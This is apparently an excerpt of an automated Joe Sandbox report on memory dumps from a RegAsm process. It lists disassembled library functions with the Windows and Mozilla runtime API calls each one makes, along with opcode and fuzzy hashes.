                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: WinVerifyTrust$wintrust.dll
                                                        • API String ID: 145871493-2991032369
                                                        • Opcode ID: 1b87324b7e38cf4afbe7d8c7d69e615970d166348bfb594146a4575c8ca5fa3f
                                                        • Instruction ID: b984c7665cf8767e3a3716ae4b3e77b960e150351c3f803958150f04ea57af14
                                                        • Opcode Fuzzy Hash: 1b87324b7e38cf4afbe7d8c7d69e615970d166348bfb594146a4575c8ca5fa3f
                                                        • Instruction Fuzzy Hash: F8E0ECB4205B429BEF00BF66D91CB067EF8BB5730CF10D515EA24D6785EBB4C061AB51
                                                        Function 6C12C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D77F6), ref: 6C12C248
                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6C12C267
                                                        • FreeLibrary.KERNEL32(?,6C0D77F6), ref: 6C12C27C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                        • API String ID: 145871493-3357690181
                                                        • Opcode ID: 3b47d215c02ffa91553672e73cdf471f65a75cb8a40630ce639d1433cb019fa5
                                                        • Instruction ID: 9c7e4ffd79e0f5f591dab35de90e7559233eb7c74b7bad1b3119ccbc24d881fd
                                                        • Opcode Fuzzy Hash: 3b47d215c02ffa91553672e73cdf471f65a75cb8a40630ce639d1433cb019fa5
                                                        • Instruction Fuzzy Hash: 68E09274205A0A9BEF04BF66A818B067AF8A75B34CF10D115EA24D6700EBB48464BB60
                                                        Function 6C12C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(wintrust.dll,?,6C0D77C5), ref: 6C12C298
                                                        • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6C12C2B7
                                                        • FreeLibrary.KERNEL32(?,6C0D77C5), ref: 6C12C2CC
                                                        Strings
                                                        • CryptCATAdminCalcHashFromFileHandle, xrefs: 6C12C2B1
                                                        • wintrust.dll, xrefs: 6C12C293
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                        • API String ID: 145871493-1423897460
                                                        • Opcode ID: 6949de3034c597e4825a88346082d5bad0061dab44f1d36ed17a8d4c0f3c79e9
                                                        • Instruction ID: 250c96b1379d292f599a0a41d70ca68dd0baa1bb1302866e51764289becbf160
                                                        • Opcode Fuzzy Hash: 6949de3034c597e4825a88346082d5bad0061dab44f1d36ed17a8d4c0f3c79e9
                                                        • Instruction Fuzzy Hash: E5E0BF74A457029FEF007F6AC918B077FF8E75720CF54C415AA1499B10DB75C024EB50
                                                        Function 6C12BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(kernelbase.dll,?,6C0D05BC), ref: 6C12BAB8
                                                        • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6C12BAD7
                                                        • FreeLibrary.KERNEL32(?,6C0D05BC), ref: 6C12BAEC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc
                                                        • String ID: VirtualAlloc2$kernelbase.dll
                                                        • API String ID: 145871493-1188699709
                                                        • Opcode ID: 180c6edaf59758dcc7f14bcd668b8473ce2262de402993ca3912b040444386fd
                                                        • Instruction ID: 7e40208c52582a5945c1db8bfd6761186a2f370e25550d4c2790200b21c7c20c
                                                        • Opcode Fuzzy Hash: 180c6edaf59758dcc7f14bcd668b8473ce2262de402993ca3912b040444386fd
                                                        • Instruction Fuzzy Hash: 9BE0B6742057879BDF00BF66C91CB0A7BF8A74620CF14D41AE925A5744EBB98064AB10
                                                        Function 6C12BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • memset.VCRUNTIME140(?,00000000,?,?,6C12BE49), ref: 6C12BEC4
                                                        • RtlCaptureStackBackTrace.NTDLL ref: 6C12BEDE
                                                        • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C12BE49), ref: 6C12BF38
                                                        • RtlReAllocateHeap.NTDLL ref: 6C12BF83
                                                        • RtlFreeHeap.NTDLL(6C12BE49,00000000), ref: 6C12BFA6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                        • String ID:
                                                        • API String ID: 2764315370-0
                                                        • Opcode ID: cacf6024e7e34cada87828ac4d4386ff6946b97c130d293cb007615b1b3eee36
                                                        • Instruction ID: 84f537ba92f8f23bac49bf68c5bcbacdf9a98330fa89d76ef22a83aed553c53e
                                                        • Opcode Fuzzy Hash: cacf6024e7e34cada87828ac4d4386ff6946b97c130d293cb007615b1b3eee36
                                                        • Instruction Fuzzy Hash: 3F51A175A002158FE720CF68CD80BAAB3B2FF98314F294679D516A7B54D738F9468F80
                                                        Function 6C118E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?,6C13D734), ref: 6C118E6E
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?,6C13D734), ref: 6C118EBF
                                                        • free.MOZGLUE(?,?,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?), ref: 6C118F24
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?,6C13D734), ref: 6C118F46
                                                        • free.MOZGLUE(?,?,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?), ref: 6C118F7A
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C10B58D,?,?,?,?,?,?,?,6C13D734,?,?,?), ref: 6C118F8F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: freemalloc
                                                        • String ID:
                                                        • API String ID: 3061335427-0
                                                        • Opcode ID: f598b3712a446bf3a69bdd42411e3f23eebb9982dbddc580929e0632d415235e
                                                        • Instruction ID: 691824b17d43421450637a7a11287383fed02f49bbd2e55650ebf907829cac08
                                                        • Opcode Fuzzy Hash: f598b3712a446bf3a69bdd42411e3f23eebb9982dbddc580929e0632d415235e
                                                        • Instruction Fuzzy Hash: 6E51C6B5A052168FEB14CF58D88076EB3B2FF45308F16457AD916ABB40E735F904CB91
                                                        Function 6C0D60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D60F4
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D6180
                                                        • free.MOZGLUE(?,?,?,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D6211
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C0D6229
                                                        • free.MOZGLUE(?,?,?,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D625E
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0D5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D6271
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: freemalloc
                                                        • String ID:
                                                        • API String ID: 3061335427-0
                                                        • Opcode ID: 7ece0c06cf831317561b0849f7ccc1420956aee0805dc11611b5a905e101a191
                                                        • Instruction ID: 2eb5ba0c2bd6720edbc2a696feff086480265d6859a9783d19036bc02c30ff41
                                                        • Opcode Fuzzy Hash: 7ece0c06cf831317561b0849f7ccc1420956aee0805dc11611b5a905e101a191
                                                        • Instruction Fuzzy Hash: 5A5189B5A007068FEB14CFA8D8907AEB7F5AF49308F164939C616D7701E731BA18CB61
                                                        Function 6C1127E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11284D
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11289A
                                                        • free.MOZGLUE(?,?,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C1128F1
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C112910
                                                        • free.MOZGLUE(00000001,?,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11293C
                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C112620,?,?,?,6C1060AA,6C105FCB,6C1079A3), ref: 6C11294E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: freemalloc
                                                        • String ID:
                                                        • API String ID: 3061335427-0
                                                        • Opcode ID: 22653b4d0ee8b5bafa755e99393f48f91c49f57706f06dbc06f8b38082739ab9
                                                        • Instruction ID: 65daedd40676db2c7822c69fc41932b43e6050b6dc27bfb13962203bbc73f567
                                                        • Opcode Fuzzy Hash: 22653b4d0ee8b5bafa755e99393f48f91c49f57706f06dbc06f8b38082739ab9
                                                        • Instruction Fuzzy Hash: AD41E2B1A0821A8FEB24CF6CD89476A73F6EF46308F150939D656EBB40E735E904CB51
                                                        Function 6C0CCFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0CCFF6
                                                        • LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0CD026
                                                        • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C0CD06C
                                                        • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C0CD139
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                        • String ID: MOZ_CRASH()
                                                        • API String ID: 1090480015-2608361144
                                                        • Opcode ID: 507f616ee52b3571d4c2f0916cf83c18b4e68ee7983f53c68e7cd858cd124c44
                                                        • Instruction ID: 0b6e6eb86e84ba5ee2c732ceabe8ec6aacb5ffde2b875b96ce8f52608ee303b8
                                                        • Opcode Fuzzy Hash: 507f616ee52b3571d4c2f0916cf83c18b4e68ee7983f53c68e7cd858cd124c44
                                                        • Instruction Fuzzy Hash: 5E41CC72B813125FDB04DEBC8C9436EB6E0EF49728F258139EA18E7784D6B199019BC1
                                                        Function 6C0C4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0C4E5A
                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0C4E97
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0C4EE9
                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C0C4F02
                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C0C4F1E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                        • String ID:
                                                        • API String ID: 713647276-0
                                                        • Opcode ID: eb3c561887139a71a02f88ba20ef7e94c5b26ac635cbaca83aa08711eb4d7bf2
                                                        • Instruction ID: cc2707215c32630fd56128dff6866ee9ca7a317a2422a171b325baea6a1eddf0
                                                        • Opcode Fuzzy Hash: eb3c561887139a71a02f88ba20ef7e94c5b26ac635cbaca83aa08711eb4d7bf2
                                                        • Instruction Fuzzy Hash: B141D171608705AFC701CFA8C480A6FBBE4BF89344F118A1DF46587741D770E955CB92
                                                        Function 6C0DC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0DC1BC
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0DC1DC
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                        • String ID:
                                                        • API String ID: 1885715127-0
                                                        • Opcode ID: c9db55a0a2a29a11504ce0ee4cd67baa5c3517b5f7b55f60d035eec4c8a36360
                                                        • Instruction ID: a65c3656b51646b4c55c021f3cd340b9712cc40e625d2295c789029bdfa52213
                                                        • Opcode Fuzzy Hash: c9db55a0a2a29a11504ce0ee4cd67baa5c3517b5f7b55f60d035eec4c8a36360
                                                        • Instruction Fuzzy Hash: D841C4B5D08350CFD710DF64C48079AB7E4BF8A708F41895DE9999B712E730E548CB92
                                                        Function 6C12A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C14F770), ref: 6C12A858
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C12A87B
                                                          • Part of subcall function 6C12A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C12A88F,00000000), ref: 6C12A9F1
                                                        • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C12A8FF
                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C12A90C
                                                        • LeaveCriticalSection.KERNEL32(6C14F770), ref: 6C12A97E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                        • String ID:
                                                        • API String ID: 1355178011-0
                                                        • Opcode ID: af86ad7d3221e1fd1f2c6b92ff47bdf3b39173c8809dc9688071fcef7bfb9e14
                                                        • Instruction ID: dc7fa0bca5d2313fff7bdeff810d07ccf424159bfd7021e9b30ab2f27fb1a9b8
                                                        • Opcode Fuzzy Hash: af86ad7d3221e1fd1f2c6b92ff47bdf3b39173c8809dc9688071fcef7bfb9e14
                                                        • Instruction Fuzzy Hash: 204191B4E002448FDF00DFA4D845BDEB771FF04328F108629E82AAB791D7359985CB91
                                                        Function 6C0D1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(-00000002,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D159C
                                                        • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D15BC
                                                        • moz_xmalloc.MOZGLUE(-00000001,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D15E7
                                                        • free.MOZGLUE(?,?,?,?,?,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D1606
                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C0D152B,?,?,?,?,6C0D1248,?), ref: 6C0D1637
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                        • String ID:
                                                        • API String ID: 733145618-0
                                                        • Opcode ID: f8cf5b8c566b7c37e761920f50ec8b1545bc12b415bd5897a03ce053b71d88c0
                                                        • Instruction ID: de65a383136835cb8fbd8f85e2107782d035fc3e1550960875865f85337a4668
                                                        • Opcode Fuzzy Hash: f8cf5b8c566b7c37e761920f50ec8b1545bc12b415bd5897a03ce053b71d88c0
                                                        • Instruction Fuzzy Hash: 7F31F672A003149BC7188E78D85066E73E9AF8537472A0B6DE823DBBD4EF30F9048791
                                                        Function 6C12AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AD9D
                                                          • Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26
                                                        • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12ADAC
                                                        • free.MOZGLUE(?,?,?,?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AE01
                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AE1D
                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C13E330,?,6C0EC059), ref: 6C12AE3D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                        • String ID:
                                                        • API String ID: 3161513745-0
                                                        • Opcode ID: eecc702b3cc8e1c0312fc8655cb740667771430cce3f8d2ad22defcf1c6362ea
                                                        • Instruction ID: 0a18b940a9649285c1b86f1f22646802a0b0a04d911460d436283a868bdf2e7c
                                                        • Opcode Fuzzy Hash: eecc702b3cc8e1c0312fc8655cb740667771430cce3f8d2ad22defcf1c6362ea
                                                        • Instruction Fuzzy Hash: 6C3134B5A003159FDB10DF758C44BABB7F8EF49614F158829E85AE7700E738E845CBA0
                                                        Function 6C125EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C13DCA0,?,?,?,6C0FE8B5,00000000), ref: 6C125F1F
                                                        • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C0FE8B5,00000000), ref: 6C125F4B
                                                        • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C0FE8B5,00000000), ref: 6C125F7B
                                                        • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C0FE8B5,00000000), ref: 6C125F9F
                                                        • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C0FE8B5,00000000), ref: 6C125FD6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
